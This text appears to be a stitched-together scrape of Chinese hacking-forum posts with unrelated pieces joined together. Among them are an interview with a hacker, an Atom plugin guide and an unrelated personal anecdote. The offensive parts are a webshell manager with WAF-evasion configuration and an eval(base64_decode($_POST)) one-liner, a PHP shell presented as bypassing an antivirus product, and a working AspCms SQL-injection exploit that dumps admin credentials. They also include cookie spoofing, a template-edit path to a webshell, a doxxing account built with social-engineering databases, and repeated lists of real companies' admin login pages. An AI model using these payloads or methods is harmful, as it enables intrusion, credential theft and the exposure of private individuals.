路由器添加域名白名单:map.baidu.com,api.map.baidu.com,s1.map.bdimg.com  (这是在首页点击商家地址后显示百度地图的
请修改程序使用editplus修改,不要使用记事本修改 否则会出问题的(百度搜索"editplus"下载)。
请使用IE9及以上的浏览器 并将浏览器设置成极速模式,否则打开会有点慢,后台显示会不全。链接http://pan.baidu.com/s/1pKxFS1d 密码m7pe

窗式、口号类广告的袭扰下,越来越多的用户对这类硬性广告产生反感的情绪,软文营销高性价比的优势逐渐凸显,对于网络营销来讲,不管是论坛营销、微博微信、博客营销,又或者是病毒式营销和事件营销,软文都以其非常强烈的指引式代入感渗透影响着用户的心理,一篇好的软文能引发用户自主购买、自发传播,产生裂变的效果。而一个好的软文营销高手,年薪百万不是梦想,你所需要的就是练就这些技能,成为一个高手。链接: http://pan.baidu.com/s/1qWY3weg 密码: bu55

Burp已经成了绿帽子门必不可少的工具,相信大家都装有Java环境,本软件支持1.7+以及所有安装了环境的系统。1.6后续会考虑兼容。
一直都有想写一款真正实用的跨平台类似的菜刀,然后可惜代码是个渣渣一直可望而不可即,后续随着公司业务增多,大多数目标都有WAF,于是就想写一款完全脱离工具,只依靠配置文件的菜刀。顺便当个码农~~~
前前后后大约花了一个月,除了打飞机的时间基本就在写这货了,这里要感谢@MelodyZX  牛,在我完成大体框架后,帮了我不少大忙,包括完成虚拟终端,非常感谢。

程序采用java语言编写,数据库采用了sqlite,本来想使用access,但是在jdk1.8以后移除了该功能,意味不能使用默认环境连接,最终我选择了sqlite,但是体积增加了800多K,程序本身只有100多K,因为引入了连接sqlite的包,后续会删除一些不想关的类来缩小体积。为了给一些爱美玩家使用,特地生成了一个带有大量皮肤的C刀,不过体积肯定也会更大。

主程序为Cknife.jar,运行后会生成Cknife.db,以及默认的配置文件Config.ini。
前面说过这是一款完全基于配置文件的菜刀,主程序只是图形的展示,以及数据的发送,我分开了每一个步骤写入到配置文件里面。可以自定义任何代码,包括更改参数名称,参数内容。
比如:
SKIN=javax.swing.plaf.nimbus.NimbusLookAndFeel 设置皮肤为nimbus
SPL=->|                表示截取数据的开始符号
SPR=|<-               表示截取数据的结束符号
CODE=code         编码参数
ACTION=action    动作参数
PARAM1=z1         参数1
PARAM2=z2         参数2
PHP_BASE64=1   当为PHP时,Z1,Z2参数是否开启自动base64加密,如果想定义自己的加密方式则关闭设置为0
PHP_MAKE=@eval(base64_decode($_POST[action]));   生成方式,这里可以不用该方式,可以用你任何想要的方式
PHP_INDEX=...             显示主页功能的代码放这
PHP_READDICT=...      读取主页功能的代码放着
PHP_READFILE=...       读取文件功能的代码
PHP_DELETE=...           删除文件夹以及文件功能的代码...
PHP_RENAME=...         重命名文件夹以及文件功能的代码...
PHP_NEWDICT=...        新建目录功能的代码
PHP_UPLOAD=...          上传文件功能的代码
PHP_DOWNLOAD=...    下载文件功能的代码
PHP_SHELL=...              虚拟终端功能的代码
如果觉得复杂,其实大多数时间只需要PHP_MAKE过WAF就行了,后面的基本不会查杀。

程序的自定义功能可以用来变相做另外一种免杀
自定义配置如下
CUS_MAKE=1
CUS_INDEX=index
CUS_READDICT=readdict
CUS_READFILE=readfile
CUS_SAVEFILE=savefile
CUS_DELETE=delete
CUS_RENAME=rename
CUS_NEWDICT=newdict
CUS_UPLOAD=upload
CUS_DOWNLOAD=download
CUS_SHELL=shell
只要写的脚本文件能与自定义的能对接上就可以使用。
那么如果做免杀呢?当你只用MAKE的时候确实想不到办法去过WAF的时候,
你可以写一个脚本比如PHP的,但是不是一句话,而是实现正常功能的脚本。
比如这个脚本为1.php,我写一个功能为显示主页的功能,然后提交1.php?action=index,
选择自定义对接,就可以与C刀进行连接了。前提是你的1.php得过WAF。

来几张图吧,先看看皮肤版
01.png
02.png
体积有点大,因为加载了皮肤包。

正常版本,皮肤用的JDK默认的几款,可以自由切换。
MAC下为MAC皮肤,其余系统为Nimbus皮肤,如果没有则使用Metal皮肤

Mac
11.png
0.png
1.png
2.png
3.png

Kali
4.png
5.png
6.png

Win
7.png
8.png
9.png

默认没有的话会使用如下皮肤
10.png

标准版:Cknife.jar
皮肤版:Cknife_Skin.jar

补充下JSP脚本的下载地址,修复了原版本菜刀JSP上传失败的问题。
下载地址:JSP

文中提及的部分技术、工具可能带有一定攻击性,仅供安全学习和教学用途,禁止非法使用!

Joomla是一套获得过多个奖项的内容管理系统(Content Management System,CMS),它采用PHP+MySQL数据库开发,可以运行在Linux、Windows、MacOSX、Solaris等多种平台上。除了具有新闻/文章管理、文档/图片管理、网站布局设置、模板/主题管理等一些基本功能外,还可以通过其提供的上千个插件进行功能扩展。同时它还支持多种语言,由于它的功能非常强大,语言支持强,因此在全世界范围内都有很广泛的应用。

漏洞技术分析:http://www.freebuf.com/articles/82811.html

百度网盘 密码:htmo

核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多

本期我们采访了核攻击。核攻击,一个再熟悉不过的ID,混迹于各大组织论坛。名声在外,兴趣广泛,涉猎奇多。第一次被采访,第一次讲诉自己的经历,第一次讲诉对安全的认识。土司人物采访中的好多朋友都是第一次被采访,过去几期是这样,以后的采访也会是这样。本系列文章目的在于以技术大牛的自诉成长等形式给安全行业增加些我们的思考。

一、自述
我,核攻击,来自中国大西北一处普通的小山村。没有富二代的财富,没有官二代的背景,也没有军二代的后盾……

小时候的记忆已日渐模糊。但依稀记得,那个家,那些年,还是全村著名的贫困户,那个每逢过年过节来讨债的大叔……

不过,小时候学习还算争气,常年霸占年级前三。家里的土坯墙也因为贴满了大大小小的各种奖状,显得金碧辉煌许多。

上学时,追逐戏闹,放学下河捉蟹。晚上在大户人家里蹭黑白电视看动画片……

时光匆匆,岁月如梭,一晃眼到了初中时代……

不负众望,如愿考上了当时县里名牌中学。

进了大县城,入了新学校。也在初一的微机课上第一次亲自摸到了只在黑白电视中见过的计算机,第一次知道还有电脑这种神奇的东西!

从此对它产生了浓厚的兴趣。闲暇时间翻阅各种教科书,逐行逐字看的如痴如醉。

课桌上的初中课本《信息技术》已快被翻烂,里边写满了各种笔记以及自己的心得体会,还在空白处手算二进制、八进制、十进制、十六进制,估计全校就我一个这么干吧,其他人都撕了折飞机……

那时,每周最期待的事情就是上微机课,每次遇到新的问题、知识,就等着在下周的微机课上实践,当时一周只有一节课,有时还被其他老师占了……

后来,应该是在初二吧,在 Word 97 中用 Visual Basic 语言写了人生中的第一个“hello, world”程序,当它成功运行时,兴奋了好几天!

再后来,渐渐地有了十块八块的零花钱,有次在报刊亭看新出的故事会,偶然间瞅到了一本关于黑客的杂志,当时还不知道黑客是什么,只是看到封面和计算机知识有关,一咬牙,拿一周的零食换了这本杂志回来!!!

然后放学火速奔回家,一头扎进去,一直看到半夜才看完,知识第一次被颠覆,原来计算机世界这么大!!!

从此一发不可收拾,什么《黑客X档案》、《黑客防线》、《黑客手册》、《大众电脑》之类的每周必买,当时只有一个报刊亭卖,每次还只有两三本,去迟了就没了!

然后白天就在学校偷偷翻杂志,把一些重要的知识点写在笔记本上,死记硬背书里的 cmd 命令,放学、放假去网吧实践……

每周的书刊都翻了又翻,里边做满了笔记,翻完杂志又去逛杂志官网论坛,自己没有电脑读取附带的光盘内容,就去下载别人发布的光盘镜像,玩那些软件玩的不亦乐乎,书籍一直保留到现在也没舍得卖。

一直买了一两年,直到后来觉得书里的内容太菜了,就再也没买了,后来互联网媒体时代到来,对传统纸质媒体产生冲击,这些书刊有些只出电子版了,大部分直接绝刊倒闭了!

这些书刊对当时的我影响很大,知识在一两年之中突飞猛进,渐渐地在当地小有名气,还收了好几个徒弟,入侵过本地几乎所有网吧,然后这些网吧老板、网管都认得我了,去上网都跟防贼似的看着,当然,也有些最后混成了朋友……

岁月匆匆,一晃眼,已步入了高二的学堂……

这一年,发生了许多事,家里的变故,再加上也没有钱继续交学费,于是就彻底告别了学生生涯,十几岁的我匆匆步入社会,开始赚钱养家……

没有任何社会经验,也没有任何工作能力,一个十几岁的未成年穷屌丝学生能干啥?

最初的几个月都在网吧包夜度过,做着黑产大牛一夜暴富的梦,混时度日,对未来一片渺茫……

数月后,在别人的介绍下,在某网吧开始当网管,一个月工资只有五百多,很低很低,只够吃饱饭,但是每天可以长时间免费上网,这令我很开心,毕竟当时网费还是很贵的……

于是,在这个嘈杂、肮脏、混乱不堪的环境中,度过了我人生中很重要的一段学习时光……

以前对硬件一窍不通,现在天天修机维护,造就了我对硬件的精通,各种疑难杂症手到病除,积累了丰富的底层硬件知识。

这是我黑客生涯最活跃、最巅峰的一段时间,白天端茶泡面、搽桌扫地、修机维护,见识社会各色人等,晚上通宵奋战,横行于各大黑客论坛之中……

也就是在这时结识了蹒跚学步的 t00ls、吾爱破解、看雪、绿色兵团,以及各类杂七杂八的技术论坛,什么黑客动画吧、黑客基地、黑鹰、Dir溢出的红客联盟,只要是个黑客技术网站,就都有我的足迹,甚至还开了个网站叫“巅峰黑客”(现在看起来,真他丫的SB!-_-!!!)!

凭着过硬的技术、雄厚的实力,在 oldjun(老君)的邀请下,混进了 t00ls 核心圈子,还当上了版主,后来因为年轻气盛和某核心成员吵架,又被赶出核心圈,至今保留一个荣誉会员称号……

那个时期,编写、发布过很多软件,可能有人还记得在 t00ls 发布的“全球首款B/S构架远控 Network Rat v8.0”,没错,那个是在网吧连续通宵三五天写出来的!但现在看起来,就像是个玩具……

在网吧的学习生涯,每天都像打了鸡血,知识面涉猎之广,连现在的我都感到恐怖,同时也赋予了我极其丰富的各类知识。

就这样,没日没夜丧心病狂的活着……

时间一晃,一半年过去了,随着在黑客圈知名度的增加,以及技术实力的增强,手里也渐渐地攒了一些钱,终于凑够钱买了人生第一台电脑!某款杂牌机!!!

之后就很少去网吧了,而是蜷缩在县城某个城中村出租屋的黑暗小角落里,用着自己新买的电脑潜心研究,脱去浮躁,慢慢向真正的技术大牛进化,足不出户,不知世上是何年……

花开花落,果生果熟,叶出叶红,叶凋雪落,又一年过去了……

在这期间丰富了更多新的知识,建立了个人小站:http://lcx.cc/,一直运行到现在,同时也见证了乌云的崛起。

后来,机缘巧合,认识了一些公司老总,在贵人大力邀请之下,告别蜷缩了几载的小小出租屋,正式进入搬砖生涯……

再后来,这些年,一直走南闯北,手里也渐渐的有了些积蓄,生活也更舒适一点了……

然后,然后就没有了……

(完)

写在最后:

正是因为对自己变态的要求,才造就了自己的现在,做!就要做第一!

我们现在还很年轻,人生的轨迹,也才刚刚开始。

这个世界,从来就没有什么公正、平等!

既然没有含着金汤勺出生,就更要付出常人千倍、万倍的努力!

在自己的道路上,谱写自己的传奇!

二、自己的故事:

1.网名是怎么来的?核总这头像啥意识?用了这么多年,有什么寓意?

其实我最早网名不叫“Nuclear'Atk(核攻击)”,而是“Hacker'Rose”,后来和 t00ls 核心吵架,那个号封了,然后新注册了一个,想着起个牛逼独特的网名,正巧看到百度新闻“…核攻击…”,就用了……后来也没改过,就用了这么多年,至于寓意,在博客也说过。

2.渗透最久的站用了用了多长时间,最后怎么搞定的?

最久的,断断续续几个月吧,最后 DDOS 迫使其更换服务器,然后你懂得……

3.当你感觉到瓶颈的时候你是怎么做的?

换个思路,绕出来,再从另一入口进,山穷水尽疑无路,柳暗花明又一村~

4.家长对你学习黑客技术持有什么样的态度?亲朋好友之间有学习黑客技术的吗?

因为对这个并不懂,但作为一门技术来说,持支持态度。
部分好友有学习。

5.还有什么其他的兴趣爱好吗?业余时间做什么?在黑客领域之外,还关注那些领域的知识?

兴趣爱好很多,音乐、游戏、电影、摄影、写作等……关注的领域也很多,主要是科技之类的。

6.谈谈大家很关心的避免水表的经验,如何保护自己?

这个问题面太广,完全可以独立写一本书,简单的说的话,把真实身份和虚拟身份隔离使用。

三、核攻击的生存现状

1.核总现在结婚了吗?孩子几岁了?爱人是做什么的呢?

结婚嘛,现在太年轻,太早!女友嘛,这是个奢侈品,不敢拥有~

2.觉得做WEB的10后挣钱方向是啥?

这个不敢妄下评论,我感觉应该是移动端吧。

3.现在的状况是什么样的?未来的打算是什么样的?

现在状况么?在某食品行业搬砖!
未来打算么?谱写自己的传奇!-_-!!!

4.核总技术做了多久?现在做的是技术还是管理?

网络安全经验,大概有十年了。
现在技术管理都做,以后可能转型为管理吧。

四、对当前网络、信息安全的看法

1.网络安全事故频发,你如何看?

任何行业都有安全事故,控制在安全的度里即可。
网络安全近几年由于媒体热炒,再加上技术广泛化,就暴露很多问题了,等过了这个时期,全民安全水平提高,就不会有那么多安全问题了。

2.对现在的国内安全现状和未来的趋势有什么见解?

国内安全现状嘛,个人感觉很混乱,毕竟是一个新兴的行业,还没有发展出自己的规则。未来应该会整合、规则化。

3.国内外的企业应该怎么样避免这些事件的再次发生?

对企业接触不多,不敢妄下评论。但肯定要学习经验、亡羊补牢。

4.对黑产和白帽子的看法是什么?

两者本质没有区别,都是靠技术生存,只是途径不一样。

5.您能否从自己的角度说下现今国内黑产现状与模式以及未来的发展趋势?

这个问题太大,就我个人观点,现在国家政策等原因,未来小鱼小虾会消失,只留下大玩家继续玩,手段也会更隐蔽,但永远都不会消失。

6.有人说黑客圈技术环境变了,在你看来之前的环境是怎么样的,现在的环境是怎么样的?

改变是肯定的,前几年行业新兴,泡沫太大,普遍浮躁,现在泡沫基本消散了,也都静下心了。

7.健康的技术环境应该是怎么样的?

那要看你如何定义“健康”了。

8.黑客需要一个什么样的环境?国家,企业,社会,媒体,个人应该怎么做?

嗯,无限零食供应,超高配置设备,舒适的工作环境,几个极品妹纸助手,嗯,一定是这样的环境!
国家,出台政策,使它逐渐正规化,像过渡到白帽子一样,合法的研究技术。
企业,正视自身网络安全问题,加强自身防范,而不是单方面指责黑客行为。
媒体,合理引导社会舆论。
个人,转职……

9.在安全行业百家争鸣的时代,核总最看好的是哪个方向呢?大数据安全分析?威胁情报?可视化安全?or等等。核总怎么看?

每个方向都各有所长、各有优缺,不能进行简单比较。
我觉得未来大数据分析预测,应该是主流方向。
这里说的不是这些企业搞得那些“概念大数据”,而是将整个社会各行各业数据进行整合分析,虚拟一个世界运行,预测未来发生的事,就像《美国队长》中的洞察计划、《少数派报告》一样,预测犯罪、事故、灾难的发生,并将其消灭在萌芽中,这是很有价值也是很恐怖的一件事。
咳!扯远了……

10.关于信息安全这个行业,核总毕竟也是行业大佬了,眼光肯定很独到,就近几年来看,安全产业发展得也算挺红火,市场需求量也在逐渐增加,政府和大众的重视程度也在提升,这是否就意味着安全行业的未来发展形势会很好,不会受到传说中的互联网寒冬的影响?

这个问题很难回答,我等屌丝也无法预测这类问题。
安全行业是基于企业安全需求的,企业有需求就不会有寒冬,安全行业是个新兴行业,还在发展中,很难预料。

五、对将要踏入信息安全行业的新朋友们提一些建议

1.针对现今网络安全人士,会点渗透,刚大学毕业,开口就要15-40k月薪的看法。小伙伴们毕业没多久,经验不足。但是开口就是几十几十k的要。互联网安全行业现在就是泡沫行业吗? 有一天会突然一下的破了吗?那些没有CISSP,CISP,CISA,Security+ 等等的人,没工作过,以前都是玩CTF长大的孩子们,他们哪里来的勇气?就敢狮子大开口?希望核总发表下核心建议。我们这年头,做安全行业的招聘也好难啊。

无论哪个行业,都不缺刚毕业狮子大开口的愣头青。
很少在安全公司混,这个我没有发言权,就不瞎指点了。
嗯,我也没有那些证。亲,我高中都没毕业,贵公司要吗?

2.渗透工程师行业将来的前景如何?核总能否就渗透相关的职业发表些看法。比如做安全服务(乙方)的,做某产的,成为某家公司的安全团队做维护该公司安全问题(算安全运维了?)的,以及为政府效力做境外目标的。就渗透而言,表弟见识短浅,觉得基本也就这几个职业了(求指点)?然后这些职业分别的优劣在哪些地方?

没在乙方待过,听乙方朋友们说,貌似都很累、甲方都很操蛋,想打人,俩字:蛋疼。
某产么,靠实力吃饭,金子满地有,看你有没有本事活着带出来。现在政策越来越严,估计死的人更多了吧。行业整体呈现龟缩状态,将面临新一轮的洗牌。
安全运维么,没待过,感觉相对乙方应该轻松点,据说是祖传背锅的。
国家队,也没待过,涉密单位,进去的朋友再也没出来过,人间蒸发了,嘘~

3.觉得渗透火候差不多了,想要接着提升安全技术,避免不走弯路的路该怎么走呢(下一阶段学啥最靠谱)?

学着如何防御被渗透,将会接触更多知识面,碰到更复杂困难的问题。

4.荐一些性价比高或者值得拥有的技术方面的书吧,越多越好哈哈。以及核总涉猎的方面的内容简单说一下,对于技术应该怎么学习?

这些年基本没看书,有问题直接百度、谷歌,所以不知如何推荐。
学习技术,面很广,我感觉,挑自己感兴趣的方向入手即可,兴趣是学习的动力!

5.有时候会不会觉得搞安全是一个坑?刚开始学习安全需要实践,但是现实是没有什么好的测试环境供大家实践,只有到处找SQL注入点,到处找XSS点,各种洞,各种点,以求技术上有所突破,但这样有可能会惹上官司,搞不好还要进去蹲上两年,安全处处充满坑,请问核总如何看待?

嗯,所以我转职做食品行业了…… -_-!!!

六、朋友眼中的核攻击

depycode:核总为人很稳重,很有大哥气质。技术很扎实,涉猎广泛深入。从他博客学到很多东西,很感谢核总。

耶稣:喜欢研究东西,,非常低调,知识非常的全面,在他的博客上面学习到了不少的经验,都是他认真思考后发的,可以学到很多。

lmy:核大大是一个很有趣的胖子,身边美女众多……此处省略一万字,重点是软硬都精,软到分分钟来场核风暴,硬到分分钟让你车熄火…借此也感谢核大大帮兄弟解决不少头疼问题…

cond0r:性格比较严肃,不容易接近,但是在技术方面很有钻研精神,有什么问题总要研究出一个所以然来,也乐意分享。

黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程

1.jpg

乌云黑客酒会'拿'走ipad,被200名黑客社会工程学30分钟拿下,应当是比警方速度快很多,谁说书生无用? 微信群里200名黑客通过各种手段在只有一个微信号的情况下,得到此人姓名,年龄,性别,邮箱,Qq,Qq群,开过什么公司,电话号,之前用过的电话号,支付宝信息,常去网站,等等,虽然走了一些弯路,最终结果以及过程.....请慢慢看正文。^_^
前因:
乌云黑客酒会嗨完了,各回各家各找各妈,周六24点在北京正是夜生活正开始的时候,此时在群里转发一条消息,

2.jpg

一个黑客聚会,怎么能被社会黑客搞定呢?群情激愤,大家在找特点,
有人在摄影师的照片中找到一个有些相似的人,第一大特点就是大光头,锁定一人,

3.jpg

此时站出一位黑阔,

4.jpg

他微信写是M后面跟个手机号,试着打了一下,空号,
接着用手机在百度搜索查询,查出来个人名,并且查出公司名

5.jpg

用姓名上北京企业信用信息网,查询有公司,早年已经注销。

6.jpg

又进入死胡同,接黑阔就翻拿走ipad哥们的朋友圈,没想到除了风景,没有什么个人信息,连张正脸照片都没有,看来还是有防范的。

7.jpg

此时,黑阔用小号联系对方,回了如下信息,这是关键点,

8.jpg

用他的这个活动,豆瓣,绿野,查出一些信息,看到一个电话号码,
如何确认电话号码就是微信同一人呢? 支付的时候会提示
9.jpg

看名字就能确认了,

有了电话,反查出来Qq群,邮箱等信息,

10.jpg

加入Qq群,看到群主,与微信同名,确认是此人,

12.png

实际,此处多名黑阔在用不同的方式进行查询人网,社工,
有黑阔直接用手机号在网上搜索,得到Qq群,

13.png

有的黑阔通过社工库,反查出来邮箱,通过邮箱查到Qq号,真是八仙过海,各显神通,就在要动用公安网查身份证时,路猫直接打通了此人电话,对方已经承认了是自己拿走了ipad,但对方只承认是捡拾的。此人已经同意将ipad归还,结果已经不重要,

社会工程学(Social Engineering,又被翻译为:社交工程学)在上世纪60年代左右作为正式的学科出现,广义社会工程学的定义是:建立理论并通过利用自然的、社会的和制度上的途径来逐步地解决各种复杂的社会问题,经过多年的应用发展,社会工程学逐渐产生出了分支学科,如公安社会工程学(简称公安社工学)和网络社会工程学。
过程整理的可能不全面,主要运用了网络社会工程学,用了多少社工库,大家自行判断。有需要30分钟全部聊天记录的,可以问我索取,将截图发你。
下回再搞黑阔聚会,我打算放一个ipad在桌上,请人自取,哈哈,看谁还敢在300多人的黑客聚会上“捡拾”ipad.

1676.jpg

最近被开发者微博圈刷屏的Atom编辑器插件,插件效果图如下:

如果来点音乐、再配上机械键盘的话,写代码是不是爽到爆呢?(脑补使用劲舞团V3…最好准备好晕车药 :))

Windows 7安装

cd .atom/packages
git clone https
://github.com/JoelBesada/activate-power-mode.git
cd activate
-power-mode
apm install

Mac安装

atom编辑器安装:

sudo brew install Caskroom/cask/atom    #OS X 10.11.不支持通过命令行安装&可通过下载DMG文件安装

atom-install shell command

cd /Users/$yourname/.atom/packages
git clone https
://github.com/JoelBesada/activate-power-mode.git
cd activate
-power-mode
apm install
apm ls 
#检测是否安装成功

Packages-Activate Power Mode: Toggle

网页效果demo:http://kushagragour.in/code-blast-codemirror/demo/index.html

atom.io:https://atom.io/packages/activate-power-mode

Atom 编辑器下载

曾经在高二的时候认识一个日本妹子,朋友介绍的,长得很可爱,身高一米六左右……老家是北海道那边的,
她的声音甜甜的,轻柔不做作,爱笑,性格嘛,特别温柔,独处的时候像猫一样温顺,黏在身边,一起看电视聊聊天。性格还是有点害羞的,人多的时候也会不好意思,腼腆地笑笑,
皮肤很白,像雪,像北海道的雪。
妹子话不多,因为我听不懂太多深奥的日语……好在她的想法基本都写在脸上,盯着她看就能猜到她的心情。
……
近距离看,长长的眼睫毛想让人亲一口。
我挺喜欢她的。
直到高三那年,在家人反对声中,也为了学业
我从硬盘里忍痛删了她....

安全狗扫描
过狗shell界面  

不堪回首的过往 不堪回首的过往[/caption]

过狗shell代码:
```
<?
error_reporting(1);
//列目录函数
function dirlist($cd){
        $dh = opendir($cd);
        while($dl = readdir($dh)){
                $dla[] = $dl;
        }
        foreach($dla as $d){
                if(!is_file($cd.$d)&&$d!="."){
                        $content.="<a href='?newdir=".$cd.$d."'>".$d."</a>"."<br />";
                }
        }
        foreach($dla as $d){
                if(is_file($cd.$d)){
                        $content.=$d."<br />";
                }
        }
        return $content;
}
//列出盘符函数
function listDisk(){
        $letters = range('b','z');
        foreach($letters as $l){
                if(is_dir($l.":")){
                        $dlist.= "[<a href='?newdir=".$l.":'>".$l."盘</a>]";
                }
        }
        echo $dlist;
}
//常量定义
$rd = $_SERVER['DOCUMENT_ROOT'];
$fd = $rd.substr($_SERVER['PHP_SELF'],0,strrpos($_SERVER['PHP_SELF'],"/"));
        
        if(!isset($_REQUEST['action'])){
                $ac = "dirlist";
        }else{
                $ac = $_REQUEST['action'];
        }
        if(!isset($_REQUEST['newdir'])){
                $cd = getcwd()."\\";
        }else{
                $cd = $_REQUEST['newdir']."\\";
                chdir($cd);
                $cd = getcwd()."\\";
        }
        switch($ac){
                case "dirlist":$content = dirlist($cd);break;
        }
?>
<html>
<style>
body{
        background-color:#000000;
        color:#FFFFFF;
}
a{
        color:#CC9900;
}
</style>
<body>
<div id="main">
    <div>
    <form name="form1" method="get" action="">
      <label>
      <input name="newdir" type="text" value="<?=$cd?>" size="60">
      </label>
      <label>
      <input type="submit" value="提交">
      </label>
    </form>
    </div>
    <hr color="#FFFFFF" />
  <div id="gongneng">文件目录:[<a href="?newdir=<?=$rd?>">站点根目录</a>][<a href="?newdir=<?=$fd?>">本文件目录</a>]<? listDisk(); ?></div>
        <hr color="#FFFFFF" />
    <div><?=$content?></div>
</div>
</body>
```
</html>
 

admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from aspcms_user where userid=1

————————————————————————
Powered by AspCms2.0
未验证权限,且存在注入漏洞
admin/_content/_About/AspCms_AboutEdit.asp?id=19
表名:aspcms_user
列名:loginname、password

利用EXP:
admin/_content/_About/AspCms_AboutEdit.asp?id=19 and 1=2 union select 1,2,3,4,5,loginname,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,password,25,26,27,28,29,30,31,32,33,34,35 from aspcms_user where userid=1

2.0漏洞测试人:逍遥复仇(请注明)

——————Cookies欺骗——————
cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9
逍遥复仇碰到一个站后台被管理员改了,NND。后台主页半天没有找到,最后去官方down源码查看是home.asp(版本不同如不对请试main.asp),工具为:Cookie & Inject Browser
——————webshell获取——————
所有版本存在后台编辑风格 可以修改任意文件,获取webshell就很简单了
admin/_Style/AspCms_TemplateEdit.asp?acttype=&filename=../../../index.asp

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail;

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

0 g$ m* u8 R- i( R' \

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

http://admin4.rd139.com/ngoss/Lo … rnUrl=/Default.aspx

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com/

http://admin2.10010.com/login/login_rollback.action

漏洞证明:

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php.

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html&;

http://job.cd.qq.com/admin/'

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

http://english7.cmail.sogou.com/control/login 搜狗

http://groupadmin.zol.com.cn/manage/login.php 中关村在线

百度

http://sfcrm-exam.baidu.com/admin/managerLoginAction.do)

http://www.baidu025.com/admin/adminindexlogin.asp

http://beat.baidu.com/wp-login.php

http://100admin.baihe.com/ 百合网;

http://game.pcgames.com.cn/admin/login.jsp 太平洋

http://admin.docin.com/docinadmin/author/login.do 豆丁网

http://edit.pcpop.com/admin/Login.aspx 泡泡网

http://xlapp.xunlei.com:8081/plaf/login.jsf 迅雷

TOM

http://mail.bj.tom.com/cgi-bin/webmail

http://sms.tom.com/tv/

http://m.tom.com/zhuanti/xwxs/index.php?page=4

http://sms.tom.com/customer/

网易

http://ria.go.163.com/login_old.php

http://product.game.163.com/admin%21index.action

http://data.ent.163.com/admin%21index.action

中国移动10086站

http://admin4.rd139.com/ngoss/Lo

http://admin.jx.monternet.com/1860/

联通

http://58.254.132.78/Club/admin/adminIndex.jsp

http://shop.admin.10010.com

新浪

http://comment.admin.sina.com.cn/cgi-bin/comment/adm_login.cgi

http://dealer.auto.henan.sina.com.cn/auto/4s-admin/login.php

http://bug.show.sina.com.cn/admin/

http://mindcity.sina.com.tw/admin/index.php

http://cinema.ent.sina.com.cn/manage/login.php

腾讯

http://cgi.data.edu.qq.com/admin/web/login.html

http://job.cd.qq.com/admin/

http://admin.dnfcity.qq.com:8080/admin/adminMain.do

http://support.qq.com/beta2/simple_admin/flogin.html

搜狐

http://reseller.mail.sohu.net/auth?next=/

http://go.sohu.com/2010mini/lephonesns/admin/

http://db.auto.sohu.com/admin/testLogin.jsp

http://cas.union.sohu-rd.com/search_wp/admin/login.php

http://cart.sohu.net/admin/

http://saa.auto.sohu.com/admin/admin/login.jsp

http://signup.ifeng.com/freeform/admin/user/login.jsp 凤凰

http://special.ku6.com/admin/login.php 酷六

http://manage.youku.com/manager/login/ 优酷

